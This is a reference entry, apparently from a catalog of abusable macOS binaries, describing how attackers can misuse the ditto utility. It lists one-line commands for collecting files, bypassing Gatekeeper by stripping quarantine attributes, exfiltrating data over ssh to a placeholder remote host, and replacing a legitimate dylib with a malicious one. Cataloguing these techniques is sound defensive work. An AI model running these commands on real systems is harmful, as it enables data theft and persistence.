ditto

ditto is a command line utility that is commonly used to copy files and directories while preserving file attributes and permissions. The tool can be used by malicious actors to collect and exfiltrate sensitive data, move laterally, and/or perform DLL hijacking or binary replacement attacks.

Author: Brendan Chamberlain (@infosecB) Created: 2023-05-04

Collection Exfiltration Lateral Movement Defense Evasion Persistence files compress recursive

Paths

/usr/bin/ditto

Example Use Cases

Copy and compress sensitive data locally

The following command gathers and compresses (-c) files from the specified folder and writes them to a zip (-k) file.

ditto -c -k --sequesterRsrc --keepParent /home/user/sensitive-files /tmp/l00t.zip

Collection Exfiltration files compress recursive

Remove extended attributes from a file

ditto can be used to bypass Gatekeeper by removing the "com.apple.quarantine" extended attribute.

ditto -c -k unsigned.app app.zip ditto -x -k app.zip unsigned.app 2>/dev/null

Collection Exfiltration files compress recursive

Copy, compress, and transfer sensitive data to a remote macOS host

The following command gathers and compresses (-c) files from the specified folder and writes them to a zip (-k) file.

ditto -c --norsrc /home/user/sensitive-files - | ssh remote_host ditto -x --norsrc - /home/user/l00t

Collection Exfiltration Lateral Movement Defense Evasion files

DLL hijacking

Replace a legitimate library with a malicious one while maintaining the original file permissions and attributes.

ditto -V /path/to/malicious-library/malicious_library.dylib /path/to/target-library/original_library.dylib

Persistence files

Detections

No detection content at time of writing